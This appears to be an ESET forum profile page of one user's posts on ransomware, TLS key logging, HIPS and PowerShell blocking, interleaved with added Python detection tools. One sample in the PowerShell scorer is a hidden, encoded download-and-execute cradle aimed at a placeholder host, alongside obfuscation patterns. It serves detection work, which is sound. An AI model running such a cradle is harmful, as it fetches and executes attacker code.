
itman
Most Valued Members
Content Count: 4,943
Days Won: 150

Kudos

  1. Upvote
    itman received kudos from fabioquadros_ in Ransomware   
    Most of the dedicated anti-ransomware solutions do the same. BTW - Check Point has an excellent anti-ransomware solution that costs around $15 USD w/yearly subscription.
    I believe Kaspersky also works the same way. In addition if its System Watcher feature is enabled, it will use a snapshot to restore any files encrypted prior to its ransomware detection mechanism kicking in.
    As far as Eset goes, your best solution is to create HIPS rules to monitor file modification activities against any of your User folders. This really shouldn't be too much of an inconvenience for the average user since those directories are not updated that frequently in normal daily use. For business environments, process exceptions would have to be created, increasing the risk of ransomware succeeding due to malware modification of those processes.
  2. Upvote
    itman received kudos from wraith in Ransomware   
    One nasty ransomware. It's disguised to appear to be a .pdf file using the xxxxx.pdf.exe naming convention.
    Appears to be one of these dreaded compile-on-the-fly .Net .dll malware buggers that then injects that .dll into a legit process. Hook a thread to the .dll and we're off and running encryption-wise.
    I would say the major complaint Eset-wise is why it didn't have a sig. for this when 37 other VT vendors did.
    Notice how it targeted WD and Malwarebytes via legit Net process use?
    Will say that this sample is a perfect example of why Eset needs "block-at-first-sight" capability; not just for Enterprise subscribers of EED.
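The post above describes a sample disguised with the xxxxx.pdf.exe naming convention. As an added example (not code from the post, the forum, or ESET), here is a small Python check that resolves the extension Windows will actually act on and flags the common disguises: a document extension in front of an executable one, Unicode right-to-left override characters that reverse the displayed tail of the name, and whitespace padding. The extension lists and the sample filenames are constructed for this example and are not exhaustive.

```python
import os
import unicodedata

# Extensions Windows hands to a loader or script host. Assumption: a representative
# set for this example, not the complete list of types Windows will execute.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
                   ".vbs", ".vbe", ".wsf", ".hta", ".ps1", ".msi", ".lnk"}
# "Harmless" extensions an attacker places in front of the real one (xxxxx.pdf.exe).
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx",
                 ".txt", ".jpg", ".jpeg", ".png", ".gif", ".zip"}


def analyze_filename(name):
    """Return the extension Windows will actually act on plus any disguise indicators."""
    base = os.path.basename(name)
    findings = []
    # Unicode format controls (category Cf), e.g. RIGHT-TO-LEFT OVERRIDE U+202E,
    # change how Explorer renders the name but not what the shell executes.
    if any(unicodedata.category(ch) == "Cf" for ch in base):
        findings.append("unicode_format_control")
    cleaned = "".join(ch for ch in base if unicodedata.category(ch) != "Cf")
    # Windows ignores trailing dots and spaces when resolving the extension.
    parts = cleaned.lower().rstrip(". ").split(".")
    true_ext = "." + parts[-1] if len(parts) > 1 else ""
    if true_ext in EXECUTABLE_EXTS:
        if len(parts) > 2 and "." + parts[-2] in DOCUMENT_EXTS:
            findings.append("double_extension")
        # Long runs of spaces push the real extension out of the visible column.
        if "   " in cleaned:
            findings.append("whitespace_padding")
    return {"true_extension": true_ext, "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    # Constructed sample names, not real malware.
    for sample in ("Invoice_2019.pdf.exe", "report.pdf",
                   "photo\u202egnp.scr", "statement.pdf                    .exe"):
        print(repr(sample), analyze_filename(sample))
```

Note that "photo\u202egnp.scr" is rendered by a bidi-aware file manager as "photorcs.png", which is why the check works on the raw code points rather than on what is displayed.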
  3. Upvote
    itman received kudos from howardagoldberg in HTTPS Monitoring   
    This is also worth a read and very much indicates that what Avast/AVG is doing is something Google doesn't approve of:
    https://techdows.com/2019/08/chrome-you-are-using-an-unsupported-environment-variable-sslkeylogfile.html
  4. Upvote
    itman received kudos from howardagoldberg in HTTPS Monitoring   
    Interesting article. I checked the environment variables for Firefox; I don't use Chrome, and Eset does not use or need to use this baloney.
    Both Avast and Kaspersky were having issues with use of their root CA certificates in Chrome a while back to decrypt SSL/TLS traffic. Appears this is Avast's solution to the problem and a very insecure one at that.
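The two posts above concern the SSLKEYLOGFILE environment variable, which makes Firefox and Chrome write their TLS session secrets to a file in the NSS key log format. As an added example, not code from the posts or from any vendor mentioned, here is a Python check of the kind a practitioner would run on a workstation: it reports whether the variable is set in the environment it is handed and, if the named file exists, how many sessions are already exposed, using a parser for the key log format. The sample log lines are constructed with placeholder hex values and are not real keys.

```python
import os
import re

# One NSS key-log line: "<label> <client_random: 32 bytes hex> <secret hex>".
# TLS 1.2 logs one CLIENT_RANDOM master secret per session; TLS 1.3 logs several
# per-stage traffic secrets keyed by the same client random.
KEYLOG_LINE = re.compile(
    r"^(CLIENT_RANDOM|CLIENT_EARLY_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|"
    r"SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_TRAFFIC_SECRET_0|SERVER_TRAFFIC_SECRET_0|"
    r"EXPORTER_SECRET)\s+([0-9a-fA-F]{64})\s+([0-9a-fA-F]+)\s*$")


def parse_keylog(text):
    """Group key-log lines by client random; returns {client_random: {label: secret}}."""
    sessions = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYLOG_LINE.match(line)
        if not m:
            continue  # tolerate junk lines rather than failing the audit
        label, client_random, secret = m.groups()
        sessions.setdefault(client_random.lower(), {})[label] = secret.lower()
    return sessions


def check_environment(env):
    """Report whether SSLKEYLOGFILE is set and, if the file exists, how many sessions it exposes."""
    path = env.get("SSLKEYLOGFILE")
    if not path:
        return {"set": False}
    report = {"set": True, "path": path, "exists": os.path.isfile(path), "sessions": 0}
    if report["exists"]:
        with open(path, "r", encoding="utf-8", errors="replace") as f:
            report["sessions"] = len(parse_keylog(f.read()))
    return report


# Constructed sample: one TLS 1.2 session and one TLS 1.3 session. The hex values
# are placeholders, not real secrets.
SAMPLE_KEYLOG = (
    "# SSL/TLS secrets log file, generated by NSS\n"
    f"CLIENT_RANDOM {'11' * 32} {'aa' * 48}\n"
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {'22' * 32} {'b1' * 32}\n"
    f"SERVER_HANDSHAKE_TRAFFIC_SECRET {'22' * 32} {'b2' * 32}\n"
    f"CLIENT_TRAFFIC_SECRET_0 {'22' * 32} {'b3' * 32}\n"
    f"SERVER_TRAFFIC_SECRET_0 {'22' * 32} {'b4' * 32}\n"
    "garbage line that a parser must skip\n"
)

if __name__ == "__main__":
    print(check_environment(os.environ))
    for client_random, secrets in parse_keylog(SAMPLE_KEYLOG).items():
        print(client_random[:8], sorted(secrets))
```

`check_environment(os.environ)` only sees the process environment it inherits. On Windows a persistent value can also live in the user or machine scope; `[Environment]::GetEnvironmentVariable('SSLKEYLOGFILE', 'User')` and the same call with `'Machine'` from PowerShell cover those, and a browser started from a parent that injected the variable will not show it in either place.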
  5. Upvote
    itman received kudos from Bigk in Duplicate IP Addresses on the network   
    The Eset firewall doesn't recognize the APIPA: https://www.pcmag.com/encyclopedia/term/37858/apipa assigned address range; i.e. 169.254.xxx.xxx. Personally, I think it's a bug.
    In any case if the router or gateway is assigning APIPA addresses to devices, it is indicative of a problem with the DHCP server.
  6. Upvote
    itman received kudos from Rami in CamScanner detected as trojan downloader (ESET Mobile)   
    Kaspersky just published an analysis on CamScanner:
    https://securelist.com/dropper-in-google-play/92496/
  7. Upvote
    itman received kudos from howardagoldberg in ESET issue with Sandboxie - Persistent holding of registry keys   
    My cleaner module ver. is currently 1195 dated 6/10. I could have sworn that it had been previously updated to 1198.
    Check what ver. your cleaner module is. If it's not 1198, you will have to switch to pre-release updates to get it.
  8. Upvote
    itman received kudos from Farah in The Rise of “Bulletproof” Residential Networks   
    An absolutely fascinating article:
    https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/
  9. Upvote
    itman received kudos from Aryeh Goretsky in AV-TEST and ESET   
    As far as AV lab tests go, they have to be scrutinized for discrepancies. For example, on the latest comparative from AV-Comparatives, Windows Defender had an unusually high false positive rate using a much smaller malware sample size. Whereas on the latest AV-Test business test, WD had a low FP rate for a much larger malware sample size.
    Bottom line - take AV lab test results as a rough approximation in regards to a security solution's real-world malware performance. Also always review as many test reports as you can from different AV labs and again, look for discrepancies.
  10. Upvote
    itman received kudos from Azure Phoenix in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Microsoft added Tamper Protection in Win 10 1903. Oddly, it has to be manually enabled.
    I keep looking for a published bypass of it, but so far so good for Microsoft. It also appears to "have held its own" against the latest and greatest version of Trickbot which tried its darnedest to disable it:
    https://www.bleepingcomputer.com/news/security/new-trickbot-version-focuses-on-microsofts-windows-defender/
    Such can not be said for Malwarebytes or Sophos.
  11. Upvote
    itman received kudos from twm in Eset Blocking Chromecast   
    Well, I guess we have "come full circle" on this discussion. So let's summarize the options:
    1. Local Chromecast dongle IP address exclusion. The Kaspersky article implies multiple addresses might be needed. Don't know fully what that is about but could imply router dynamic address assignment. Therefore static address assignment would be required as previously posted.
    2. Exclude port 8009 from SSL/TLS protocol scanning. No qualms with this one since it wasn't being previously scanned. I also believe other ports might need exclusion but "time will tell" on that one.
    My own thoughts on this issue are on the whole subject of allowing an IoT device direct access to your PC. But that's another separate topic discussion.
    A footnote comment. Eset has "opened Pandora's Box" in regards to future issues with performing SSL/TLS scanning of all ports. I, for one, will avoid assistance on any of those issues.
  12. Upvote
    itman gave kudos to rsternap in Eset Blocking Chromecast   
    Try the help page here under 'problem accessing a device on your network'
    https://help.eset.com/ees/7/en-US/solving_problems_protocol_filtering.html
    Adding the Chromecast IP address to the exclude list worked for me.
    Find the address in the Google Home app - tap the icon for your Chromecast device, tap settings (gear symbol), scroll down to information.
  13. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add option to realtime scanner to block obfuscated PowerShell scripts. Option would be dependent upon Win 10 AMSI option enabled in the Eset GUI.
    Justification
    Microsoft added a like mitigation in the form of a Windows Defender Exploit Guard ASR mitigation effective with Win 10 1709. ASR mitigations are only effective if Windows Defender is enabled as the realtime scan engine.
    Further justification is Eset's failure to detect malware in highly obfuscated PowerShell script in a Malware Research Group ad hoc test: https://www.mrg-effitas.com/research/current-state-of-malicious-powershell-script-blocking/
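The feature request above asks for blocking of obfuscated PowerShell. As an added example, not ESET's or Microsoft's detection logic and not code from the post, here is a Python scorer of the kind a detection engineer would prototype before tuning a real rule: it decodes a `-EncodedCommand` payload (base64 of UTF-16LE text), then counts indicators such as `IEX`, `[char]` casts, short-string concatenation chains, the `-f` format operator, backticks inside identifiers, download cradles and hidden/no-profile switches, and adds a character-entropy check. The thresholds and the sample scripts are constructed for this example; the malicious sample points at an `.invalid` host and is harmless.

```python
import base64
import math
import re
from collections import Counter


def shannon_entropy(text):
    """Bits per character; long base64 blobs push a script well above ordinary code."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


# -EncodedCommand and its short forms (-e, -ec, -enc) take base64 of UTF-16LE script text.
ENC_ARG = re.compile(r"(?<![\w-])-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(script):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_ARG.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Heuristic indicators. Assumption: thresholds and weights chosen for illustration.
INDICATORS = [
    ("encoded_command", ENC_ARG),
    ("invoke_expression", re.compile(r"(?<!\w)(?:iex|invoke-expression)(?!\w)", re.I)),
    ("char_casts", re.compile(r"\[char\]\s*\d+", re.I)),
    ("string_concat_chain", re.compile(r"'[^']{0,4}'\s*\+\s*'[^']{0,4}'")),
    ("format_operator", re.compile(r"\{\d+\}[^\n]*?['\"]\s*-f\s", re.I)),
    ("backtick_in_identifier", re.compile(r"[A-Za-z]`[A-Za-z]")),  # I`E`X style; `n and `t also match, so it is a weak signal
    ("reverse_string", re.compile(r"\[array\]::reverse|-join\s*\$?\w*\[\s*-1\s*\.\.", re.I)),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|(?<!\w)iwr(?!\w)", re.I)),
    ("hidden_or_noprofile", re.compile(r"(?<![\w-])-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|noni(?:nteractive)?)(?!\w)", re.I)),
]


def score_script(script):
    """Score a command line or script body; the decoded payload is scanned too."""
    decoded = decode_encoded_command(script)
    text = script if decoded is None else script + "\n" + decoded
    hits = {}
    for name, rx in INDICATORS:
        n = len(rx.findall(text))
        if n:
            hits[name] = n
    score = sum(min(n, 3) for n in hits.values())  # cap each indicator at 3
    entropy = shannon_entropy(script)
    if entropy > 5.0:  # plain scripts sit roughly around 4.2-4.8 bits/char
        hits["high_entropy"] = 1
        score += 2
    return {"score": score, "entropy": round(entropy, 2), "hits": hits, "decoded": decoded}


# Constructed samples for this example.
BENIGN = "Get-ChildItem C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB } | Sort-Object Length -Descending"
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
MALICIOUS = "powershell.exe -nop -w hidden -enc " + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
OBFUSCATED = "$a=('I'+'E'+'X');&$a ([string]::Join('',([char]72+[char]105)))"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("encoded", MALICIOUS), ("obfuscated", OBFUSCATED)):
        print(label, score_script(sample))
```

In production the same indicators would be applied to the script content AMSI hands the scanner after PowerShell has already unwrapped each layer, which is what makes AMSI the right hook for this: the encoded and concatenated forms above all arrive at AMSI as the plain text they build.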
  14. Upvote
    itman received kudos from Azure Phoenix in Future changes to ESET Internet Security and ESET Smart Security Premium   
  15. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add a column showing PID number in the following logs after the noted existing log column headings:
    1. HIPS - Application
    2. Network - Source
    This is necessary to properly identify the origin for multiple same process occurrences such as svchost.exe. 
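The request above is for a PID column so that several svchost.exe instances can be told apart. As an added example, not ESET's log format and not code from the post, here is a Python parser for the output of `tasklist /svc`, the Windows command that maps each PID to the services it hosts; with a PID from a log entry it resolves which services that svchost.exe instance is running, and it lists the image names a PID-less log cannot disambiguate. The sample output is constructed to the real column layout (wrapped service lists continue on indented lines) and uses illustrative PIDs.

```python
import re
from collections import defaultdict

# "Image Name <spaces> PID Services"; the image name may contain spaces, so the
# lazy match stops at the last run of whitespace before the numeric PID.
ROW = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<services>.*)$")


def parse_tasklist_svc(text):
    """Parse `tasklist /svc` output into {pid: (image_name, [service names])}."""
    table = {}
    last_pid = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("Image Name") or line.startswith("="):
            continue
        if line[0].isspace() and last_pid is not None:
            # Continuation of a wrapped service list for the previous row.
            table[last_pid][1].extend(s.strip() for s in line.split(",") if s.strip())
            continue
        m = ROW.match(line)
        if not m:
            continue
        pid = int(m.group("pid"))
        services = [s.strip() for s in m.group("services").split(",") if s.strip()]
        if services == ["N/A"]:
            services = []
        table[pid] = (m.group("image"), services)
        last_pid = pid
    return table


def services_for_pid(table, pid):
    """Services hosted by a given PID (empty for ordinary processes or unknown PIDs)."""
    return table.get(pid, (None, []))[1]


def pids_for_service(table, service):
    """PIDs hosting a service, matched case-insensitively."""
    wanted = service.lower()
    return sorted(pid for pid, (_, svcs) in table.items() if wanted in (s.lower() for s in svcs))


def ambiguous_images(table):
    """Image names running under more than one PID: exactly what a PID-less log cannot separate."""
    by_image = defaultdict(list)
    for pid, (image, _) in table.items():
        by_image[image].append(pid)
    return {img: sorted(pids) for img, pids in by_image.items() if len(pids) > 1}


# Constructed sample in the `tasklist /svc` layout; PIDs are illustrative.
SAMPLE = """\
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
svchost.exe                    824 BrokerInfrastructure, DcomLaunch, Power,
                                   SystemEventsBroker
svchost.exe                   1012 RpcEptMapper, RpcSs
svchost.exe                   1244 Dhcp, EventLog, lmhosts
explorer.exe                  4120 N/A
"""

if __name__ == "__main__":
    table = parse_tasklist_svc(SAMPLE)
    print("PID 1244 hosts:", services_for_pid(table, 1244))
    print("Dhcp runs in:", pids_for_service(table, "Dhcp"))
    print("ambiguous without a PID:", ambiguous_images(table))
```

Because PIDs are reused after a process exits, the snapshot has to be taken close to the time of the log entry; for a historical entry, Sysmon or Windows Security event 4688 records, which carry PIDs and creation times, are the more reliable source.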
  16. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    It actually used to do this prior to ver. 11. I believe this has something to do with Microsoft's decree to AV vendors that they can't interfere with the boot process in Win 10 ver. 1709. I am actually surprised that Eset even processes an Ask HIPS use in ver. 11 and instead, just auto allows it. I know it is doing so because it will slightly delay your boot time; something I thought wasn't supposed to happen on Win 10 ver. 1709.
    Again it is a bit peculiar that the HIPS default action is allow. However, it always has been this way. To be honest, I seriously doubt Eset will change it to block mode.
    A proper frame of reference for you is Eset first and foremost created the HIPS for its own internal use. As such, it really isn't designed to be user configurable other than to create a few exception rules. This is more so evident in the retail vers. of Eset. For example, Eset added file wildcard capability a while back for the Endpoint vers. but refuses to do so for the retail vers.
  17. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I explained this once to you. Eset has internal default rules and those rules take precedence over any user created rules.
    Also if an alert response is not received within a short period of time, Eset will auto allow the action. This comes into play for example with any ask rule that might be triggered during the boot process. Those will be allowed by the time the PC initializes, the desktop appears, and finally the Eset GUI is started. 
  18. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Nvidia in their "infinite security wisdom" created two .bat scripts they dumped in the C:\Windows directory. Their startup service can run these .bat scripts if errors are encountered in their software as recovery procedures. So basically, you have to allow svchost.exe to run cmd.exe. Not the most secure thing to do if malware creates a malicious service. Hence my recommendation that file wildcard support is needed.
    There is also the issue of why the HIPS hasn't been updated to reflect Win 10's current ability to uniquely identify an individual svchost.exe service by process id. 
  19. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Yeah, I know about this.
    Just be careful with GitHub software. Being open source, it can be hacked. One of the major sources of nasty backdoors has been GitHub software.
  20. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    As far as anti-exec processing, there is one built into Win 10 - native SmartScreen. I have tested with a couple of unknown reputation files and each time got an alert from it when they tried to run. Eset let the files run w/o issue. Neither file was malicious but I prefer an option to disallow execution in this instance.
    The downside is native SmartScreen relies on "The Mark of the Web" remaining associated with the downloaded file. There are ways to "strip that off" of a download.
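The post above notes that SmartScreen depends on the Mark of the Web staying attached to a download. That mark is the NTFS alternate data stream `Zone.Identifier`, an INI-style text with a `ZoneId` and, on recent Windows builds, the `ReferrerUrl` and `HostUrl` the file came from. As an added example (not code from the post, and not Microsoft's implementation), here is a Python parser for that stream body plus a Windows-only reader, with a constructed sample stream. SmartScreen and Office Protected View act on zone 3 (Internet) and zone 4 (Restricted sites); anything else, or a missing stream, is treated as local.

```python
import sys

# Zone IDs as used by URLMON and written into the Zone.Identifier stream.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}


def parse_zone_identifier(text):
    """Parse the INI-style body of a Zone.Identifier stream."""
    data, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            data[key.strip()] = value.strip()
    zone_id = int(data["ZoneId"]) if data.get("ZoneId", "").isdigit() else None
    return {
        "zone_id": zone_id,
        "zone": ZONE_NAMES.get(zone_id, "none" if zone_id is None else "unknown"),
        "referrer_url": data.get("ReferrerUrl"),
        "host_url": data.get("HostUrl"),
        # SmartScreen and Protected View only engage for Internet / Restricted zones.
        "smartscreen_applies": zone_id in (3, 4),
    }


def read_motw(path):
    """Windows only: the stream is addressed as <file>:Zone.Identifier.
    Returns None when the file carries no mark (which is what stripping it produces)."""
    if not sys.platform.startswith("win"):
        raise OSError("alternate data streams are an NTFS feature; run this on Windows")
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except FileNotFoundError:
        return None


# Constructed sample of what a browser writes for an Internet download (CRLF line ends).
SAMPLE_MOTW = ("[ZoneTransfer]\r\n"
               "ZoneId=3\r\n"
               "ReferrerUrl=https://example.invalid/downloads/\r\n"
               "HostUrl=https://cdn.example.invalid/setup.exe\r\n")

if __name__ == "__main__":
    print(parse_zone_identifier(SAMPLE_MOTW))
    if sys.platform.startswith("win") and len(sys.argv) > 1:
        print(sys.argv[1], read_motw(sys.argv[1]))
```

The same stream is what PowerShell's `Get-Item -Path <file> -Stream Zone.Identifier` shows and what `Unblock-File` deletes; archive extraction, copying to a FAT/exFAT volume, or a `copy` from inside some tools drops it as well, which is the stripping the post refers to.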
  21. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I did some of my own testing in regards to this business about the HIPS not detecting Farbar activity. For starters, I set the HIPS to Interactive mode and then ran Farbar.
    To begin with, Farbar will load and begin execution because you started it manually. However, the first attempt by Farbar to perform any activity the HIPS monitors for will cause an alert as shown by the below screenshot.
    Now if you create a .bat script and run Farbar by execution of the script, you will receive a HIPS alert about the startup of Farbar. Likewise, malware doesn't magically run by itself. Something has to execute it. 

  22. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I have run Farbar in the past and Eset HIPS in Auto or Safe mode will not alert because its a safe app.
    Are you saying that the HIPS in Interactive or Policy mode is not throwing an alert at Farbar startup time?
  23. Upvote
    itman received kudos from persian-boy in Future changes to ESET Internet Security and ESET Smart Security Premium   
    You will need to show an example of an .exe that Eset HIPS did not detect running in Interactive mode. The only way I know that could occur is if you inadvertently created an allow rule while running in Training mode or by manual creation. 
    One possibility for example is that an allow rule was created for a process to start another process. If the allow rule did not specifically state what process start up was allowed, then Eset will allow any child process startup from the parent process.